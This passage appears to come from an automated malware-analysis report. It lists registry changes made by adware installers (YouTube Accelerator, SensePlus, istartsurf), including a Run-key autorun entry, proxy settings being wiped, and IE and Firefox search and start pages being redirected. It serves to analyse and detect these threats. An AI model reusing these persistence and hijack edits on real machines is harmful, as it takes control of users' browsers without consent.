"{K7C0DB872A3F777C0}" = "E9 33 CC 0D 40 17 1F 46 74 E8 01 64 22 18 AF B6"

[HKLM\SOFTWARE\Wow6432Node\Goobzo\YouTube Accelerator\Tracer]
"TracerDoBackup" = "1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecision" = "0"

[HKCU\Software\Goobzo\YouTube Accelerator]
"SBPID" = "bae5301f-e912-4c89-9f86-33667e27356d"

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}\LdsE]
"(Default)" = "mncEDgoMD^EumhBjdoZbB"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\RFC1156Agent\CurrentVersion\Parameters]
"TrapPollTimeMilliSecs" = "15000"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Wow6432Node\Goobzo\YouTube Accelerator\Tracer]
"TraceDestination" = "3"
"TimeStamp" = "1429400145"

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}\pseKcc]
"(Default)" = "LIekbRXX|SYWpfDD`L[A|sXNDUsk@"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 04 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Goobzo\YouTube Accelerator]
"SBAID" = "e59a543c-07c1-4575-b0a1-b17d7cfac7a7"

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}\Uojvoqeov]
"(Default)" = "YeDTVOw~{P"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware deletes the following registry key(s):

[HKCU\Software\Goobzo\YouTube Accelerator\AdditionalInfo]

The Malware deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}]
"Uojvoqeov"
"qvorsEtjxw"
"qvbbRNdMg"
"cgcdxuSksc"
"LdsE"
"fSXewhkfv"
"yxQHXfdfitoe"
"pxylOXnGwpXkz"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}]
"jugyvwoEcjGw"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDetectedUrl"

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}]
"sehlsRMuplph"
"wjxsvv"
"rffapxdttSchh"
"yEsrDTepOCs"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}]
"hFLwn"
"DxOl"
"FdUXjkIpvn"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}]
"qPacydvhduuR"
"MNEMOyZJWG"
"omdjT"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}]
"uqmpybcjdI"
"pseKcc"

The process YouTubeAcceleratorService.exe:3700 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Wow6432Node\Licenses]
"{I3B3ED09D712B0615}" = "07 00 00 00"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\RFC1156Agent\CurrentVersion\Parameters]
"TrapPollTimeMilliSecs" = "15000"

[HKLM\SOFTWARE\Wow6432Node\Licenses]
"{03B3ED09D712B0615}" = "56 3E A8 0E 0B A2 A7 A6 41 06 53 98 7B A4 44 A3"

The process YouTubeAcceleratorService.exe:3308 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Wow6432Node\Microsoft\RFC1156Agent\CurrentVersion\Parameters]
"TrapPollTimeMilliSecs" = "15000"

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}\TypeLib]
"(Default)" = "{9B085638-018E-11D3-9D8E-00C04F72D980}"

[HKLM\SOFTWARE\Wow6432Node\Licenses]
"{I3B3ED09D712B0615}" = "01 00 00 00"
"{03B3ED09D712B0615}" = "56 3E A8 0E 0B A2 A7 A6 41 06 53 98 7B A4 44 A3"

[HKLM\SOFTWARE\Wow6432Node\Goobzo\YouTube Accelerator\Tracer]
"TraceLevel" = "0"

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}\ProgID]
"(Default)" = "BDATuner.ChannelTuneRequest.1"

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}\InProcServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Wow6432Node\Licenses]
"{K7C0DB872A3F777C0}" = "F5 C4 D8 BE 40 17 1F 46 74 E8 01 64 22 18 AF B6"

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}\Version]
"(Default)" = "1.0"

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}\VersionIndependentProgID]
"(Default)" = "BDATuner.ChannelTuneRequest"

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}]
"(Default)" = "BDA Tuning Model Channel Tune Request"

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}\InProcServer32]
"(Default)" = "C:\Windows\SysWOW64\msvidctl.dll"

The Malware deletes the following value(s) in system registry:

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}]
"0"

The process bi.exe:2320 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi31EA.tmp\install20087.exe,"

The process Hbiagmhjfvp.exe:3504 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\AppDataLow\Software\Crossrider]
"Bic" = "f1455de99fbc9c9080e7ed2fd747836eIE"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SensePlus]
"CrPublisherId" = "20891"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKLM\SOFTWARE\Wow6432Node\Tempo]
"(Default)" = "tempo"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKLM\SOFTWARE\Wow6432Node\AppDataLow\Software\Crossrider]
"Verifier" = "b2eb32d323f5359842a735827d51a4f5"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SensePlus]
"DisplayVersion" = "1.36.01.22"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\InstalledBrowserExtensions\20891\Status]
"Installed" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecisionTime" = "30 23 33 67 30 7A D0 01"

[HKLM\SOFTWARE\InstalledBrowserExtensions\20891]
"70299" = "SensePlus"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "F9 96 66 65 30 7A D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SensePlus]
"DisplayIcon" = "%Program Files% (x86)\SensePlus\utils.exe"

[HKCU\Software\AppDataLow\Software\Crossrider]
"Verifier" = "b2eb32d323f5359842a735827d51a4f5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadNetworkName" = "Network 4"

[HKLM\SOFTWARE\Wow6432Node\InstalledBrowserExtensions\20891\Status]
"Installed" = "1"

[HKLM\SOFTWARE\Wow6432Node\SensePlus\Installer]
"BundledFirefox" = "1"

[HKLM\SOFTWARE\Wow6432Node\AppDataLow\Software\Crossrider]
"Bic" = "f1455de99fbc9c9080e7ed2fd747836eIE"

[HKLM\SOFTWARE\Wow6432Node\InstalledBrowserExtensions\20891]
"70299" = "SensePlus"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SensePlus]
"Publisher" = "Sense "
"DisplayName" = "SensePlus"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 56 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SensePlus]
"CrAppId" = "70299"
"UninstallString" = "%Program Files% (x86)\SensePlus\Uninstall.exe /fcp=1"

[HKCU\Software\InstalledBrowserExtensions\20891]
"70299" = "SensePlus"

[HKCU\Software\InstalledBrowserExtensions\Sense ]
"70299" = "SensePlus"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKCU\Software\InstalledBrowserExtensions\20891\Status]
"Installed" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Wow6432Node\Tempo]

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process YouTubeAccelerator.exe:2288 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\Goobzo\YouTube Accelerator]
"UiResVer" = "1000008"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Wow6432Node\Licenses]
"{03B3ED09D712B0615}" = "56 3E A8 0E 0B A2 A7 A6 41 06 53 98 7B A4 44 A3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKLM\SOFTWARE\Wow6432Node\Licenses]
"{I3B3ED09D712B0615}" = "0C 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecisionTime" = "F9 96 66 65 30 7A D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "E5 B2 A4 63 30 7A D0 01"

[HKCU\Software\Goobzo\YouTube Accelerator\Tracer]
"TraceLevel" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Goobzo\YouTube Accelerator\Tracer]
"TraceFolder" = "C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Log\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadNetworkName" = "Network 4"

[HKCU\Software\Goobzo\YouTube Accelerator]
"CommTestBootNeeded" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 55 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Goobzo\YouTube Accelerator\Tracer]
"TracerDoBackup" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\RFC1156Agent\CurrentVersion\Parameters]
"TrapPollTimeMilliSecs" = "15000"

[HKCU\Software\Goobzo\YouTube Accelerator\Tracer]
"TraceDestination" = "3"
"TimeLimit" = "1"
"TimeStamp" = "1429400145"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
"WpadDecision" = "0"

To automatically run itself each time Windows is booted, the Malware adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"GOOBZOYouTubeAccelerator" = "%Program Files% (x86)\YouTube Accelerator\YouTubeAccelerator.exe /startup"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Goobzo\YouTube Accelerator]
"ShowTrayMessage"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process jsdrv.exe:3700 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKLM\SOFTWARE\Wow6432Node\ShopperPro\JsDriver\Tracer]
"TraceLevel" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "CF 09 4B 61 30 7A D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadNetworkName" = "Network 4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 52 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecisionReason" = "1"

"WpadDecisionTime" = "D6 65 1F 63 30 7A D0 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process wpm_v20.0.0.1953_0302.exe:5000 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 5A 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

"UNCAsIntranet" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process cfeca700-7b58-4ebe-8806-aa3ea96213cd-4.exe:4516 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Wow6432Node\Tempo]
"(Default)" = "tempo"

[HKLM\SOFTWARE\Wow6432Node\iWebar\U/mwtMJQRCKR0dU2rxQ4oph6X45x6O83/tPa4qzbRFFQlpD8vi6EOqZi22NegCITusO1G3TtiH4LD Z8Lxftub6x5B8oXx7BwmBtVZA3jXV8s 2z06x6XpZkQN/5ATUtsPzEooip2Zh6xCXLYw dv uJG8jyegsaBUbTRn9nZDo=]
"Ul0n1X03IbQ6xiPBCEDslxZ9fsRrLJ/vqSZLr9gZ0O KUCestLVRWje2vR4RIlDDKH6ZKOwvlLyt17ra1z7xzZbKWwqNFFUjlmufcqRV4ch2iTPwfFjrdfz6c e4uUdC3qjqU0STqs6kBy2ggedKg6oa4w0h8SvBpRP2bxSQ61k=" = "1"

[HKLM\SOFTWARE\Wow6432Node\iWebar\Sxuc s6UHdkkBMI3TPbMDdOjupuw7F18Q7PshVRAk FZxDEu/apwrp/9MdF8gTh0dCgXajutsY2KOoFd bv1IitpbTes0RLNENToBGpPazaoliQi1tkegTAcOIGyiV3QRp6V6OquZlyL /e6vfFjGnQ2gaaJ1Jlo4GCXzibNflw=]
"llN1Jcd35X4oPnbdFkuoaACNUqQF3snJnuz/hEY7eN/KVqlSiUdbHUs0LaqrObNekoMAj 6UjKIgs U8d5qa1I/EEhPonbr1w3ffKbLitE1rN/cC9quJsxaJcPzDykUgzwFqrF/ Gzt 478ht9jhE3pvsTEzQ23gIYgcxI94mLs=" = "1"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Wow6432Node\Tempo]

The process 45B6.tmp:3512 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "EB 7A F6 55 30 7A D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadNetworkName" = "Network 4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 4C 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecisionReason" = "1"

"WpadDecisionTime" = "15 E3 0E 5C 30 7A D0 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process QQBrowser.exe:4888 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Malware deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process QQBrowser.exe:3168 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\Mozilla\Extends]
"AppID" = "[email protected]"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{33BB0A4E-99AF-4226-BDF6-49120163DE86}"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Search Page" = "http://www.istartsurf.com/web/?type=ds&ts=1429400145&from=smt&uid=267123711_198339_B48A115F&q={searchTerms}"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL" = "http://www.istartsurf.com/web/?type=ds&ts=1429400145&from=smt&uid=267123711_198339_B48A115F&q={searchTerms}"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall]
"Publisher" = "istartsurf"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Default_Search_URL" = "http://www.istartsurf.com/web/?type=ds&ts=1429400145&from=smt&uid=267123711_198339_B48A115F&q={searchTerms}"

[HKLM\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command]
"(Default)" = "%Program Files% (x86)\Mozilla Firefox\firefox.exe http://www.istartsurf.com/?type=sc&ts=1429400145&from=smt&uid=267123711_198339_B48A115F"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall]
"DisplayIcon" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\UninstallManager.exe"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"DisplayName" = "istartsurf"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL" = "http://www.istartsurf.com/web/?type=ds&ts=1429400145&from=smt&uid=267123711_198339_B48A115F&q={searchTerms}"

